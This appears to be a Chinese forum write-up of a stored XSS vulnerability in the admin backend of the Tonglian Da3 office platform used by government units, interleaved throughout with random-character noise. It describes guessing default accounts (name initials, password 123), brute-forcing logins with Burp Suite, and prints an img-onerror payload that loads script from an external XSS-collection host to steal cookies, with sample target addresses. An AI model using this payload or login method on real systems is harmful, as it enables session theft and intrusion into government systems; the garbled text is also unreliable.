% y# l( a7 b3 l! y7 P
3 W( i, }" f+ { X0 K 同联Da3协同办公平台后台通用储存型xss漏洞* l; O% l5 d3 s1 O. I& c1 \% R# y# y
?) w+ D4 Q0 o$ M: _; B5 F
1 W# @& v6 v9 Y8 J 平台简介:3 l- t8 S8 ]& m7 ?
/ ~/ G/ A# i1 G# l$ L
: P+ l6 }( G: P, ~% V0 w4 G+ y ) N8 l7 Y- b3 }
& m7 a! v# O0 R6 t- _
. Q* K, r' X; l9 ]7 y 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" ^0 d5 m) e1 `3 q- z
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
- j1 H; j* q _- E0 n- h
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!8 r* X* _# V. ^" ?) G6 _* d! e
d3 _; C" K7 o# O `) p2 m- q
$ G. g2 N. p5 j( S
+ g, }! Z) ~, B" K# A. s# j
" S/ |1 i6 X' g5 B
& x3 _; Z2 F% W, O$ L( J1 z; {. [ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; ~( g+ A4 p7 r+ H
( V, q! W! R @3 J 7 S) z: X/ @, E
- `% q x6 R; p( I
0 n5 S* B6 ?* t# j& F g2 O+ s) C . Y$ F0 e Y! S2 t1 j* s' y" {, @
http://1.1.1.1:7197/cap-aco/#(案例2-)! M4 D1 S0 P& g5 ], B
^4 j0 d& {% V Q6 O9 N: i( @ ]: v# v( ~! o1 S8 ]5 F1 F0 V
http://www.XXOO.com (案例1-官网网站)
; S1 Z4 o) y5 J+ N* u# m
3 w! V! g2 D8 D) h
8 Y0 \4 F) H. v. o7 O3 U5 ? 漏洞详情:- g# P4 n" L, ^0 `6 r$ y
/ A$ f8 h! ?/ ^. @* t ; E) q) [4 P$ t: S' j7 {
案例一、8 I; x0 K' _! g( E- V
8 r; u2 W+ V" N# {1 I; T : F }- H2 P/ r! |( N
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
# p8 y, g4 {6 x
1 @! z1 F+ ^/ w. r T, Z; l2 m7 ~
\, L, r9 o' O- \' N& D; d 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:! S3 F' v: Y! g) Q3 X7 Q5 F# @
' E' j9 F. j! d8 I/ p U/ y1 S* @ : E- w+ l5 l2 V0 w% \2 e+ B
/ Q2 h6 r. X; _% X
9 \1 f# h: `; |$ E( _% u
# d! L7 F3 @ d: N
, p% a. e4 U) g/ Y8 u7 x0 C' B& R
9 ?/ J' _7 }3 L0 p" v* f: u
( b3 [% Z% A; h# j status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: " Q' G$ l, B& Z9 O7 G+ J, U7 U. [1 {
/ k& }% H' l9 ]! _7 @ 8 p3 L& p9 ]# `# o$ d9 G, [) B; V
1 K8 y2 t: z7 |
( `& J' W. m% P
6 Y4 C% \+ {1 ^) K* I- W
" P2 ]" @, r, P: W/ \, H
R- H: Z) ?4 x
/ g! [0 V" `# W! W( ~( f1 x G
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
2 L! i, b X1 `- [0 b
$ N/ u8 U: o \8 N
' p% ?- y$ E. |& z/ D 0 f W- {0 h) u( d1 y+ o" S1 J
/ u P* } I9 O1 p2 z5 s7 z
4 @/ G* C2 ?% C0 j8 o <img src=x8 U/ Y; u, r0 C0 t1 {
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
5 [( U, |2 h" n
8 U P5 o2 }; U/ S
% C4 T2 a& |' }* l& w" v; L! j
( [) T9 I8 H6 Q% n7 M
$ p& T2 M8 q+ E+ _% j7 T
# M/ L( x; C7 c3 `# i
然后发送,接收cookie如图: 8 ^+ O& [7 a% G% z7 \9 P
. p% l$ A, m W" y! m
, y, \" Z$ N6 x2 d2 Y
9 o+ b9 ^# l1 P$ v; K. t
2 c7 Y7 m+ Z I9 {. H ]$ n% d0 ?
x5 m" E( o3 w: j * S; F) w6 w5 d: s1 B- M. g
! h9 ~. q' |0 ~! t9 R0 f : B' c2 `( y6 F- l
% T" r) U1 v! Y; P: s) `3 y
v5 i, h' b# u0 w, b5 G5 `
; N" a& R2 K) \- `5 M' e. X. b 8 \! w. U o7 c2 h3 m
* L l+ C3 q [. c% C$ V
8 a- w# y$ R8 ?# t0 r- T
0 [8 i( H* {7 b' ]
6 I0 x1 P" Q6 M3 K: V
7 w$ D% ?; d! d; i5 j- v! S 3 M! y$ d2 N, L) }- z% `8 P3 r
% F9 x4 q* n! g1 s( Y% Y: ~1 m1 I
) s) }7 _+ V* h" W
; K* g$ `" g0 u/ d# j8 `
/ |& F( a" X8 ~4 b
6 j1 h% U, M5 a+ r7 r 案例2、 - ^0 \) j' T4 s3 [( `
3 o. M+ Q: X: c# ?
4 J/ k' x, v" I3 w3 b 前面步骤都一样,下面看效果图:
' D- u" T" K1 [, X4 l" f6 E1 ^
/ k7 X, n( J) n5 r
( V6 l6 c# h- b
" P& M% ^/ r0 z- O! c
; g6 e" `6 t$ c: Z9 C; C
) @) P7 i( U2 E3 z 2 R& y. G) i6 m
c' ?& J. z) e" P' S
: b9 r0 w3 ~) z- [9 r
& L+ h: C# r/ n: d+ G& C
7 e% c% P+ l8 v. D
& d( ^0 X% P1 a( K6 N* e0 f
7 G6 U1 j) e, ?: G. F6 l! o
6 O9 e/ X& z+ i : N8 c+ J$ b! @: V Q. V' [
; D8 ` J9 Y/ P. M* T! \
# L& {' s5 v1 k0 Z$ l- i
0 J' S, {/ Q( n; N
) p) Q2 T6 h, s! B+ `! d! \
8 [+ a5 e0 {% J9 R' {; ^
9 X" [6 D; n3 M+ V3 ^ 8 t2 R) O% X7 v! K4 k
! n( x8 [, s* }* r* V/ N8 n - `1 e9 P E3 N5 g4 X( k1 {4 z2 E( x
: z- @ j: k+ s' M; k$ v* l2 w; V( i
% Q/ `: O* C, N" u- A # @9 [8 z* ~/ E# C. @
, B1 m2 _& |% A, [( g
( L* d8 s; a8 ^8 n% \' ]& n4 `1 f0 ~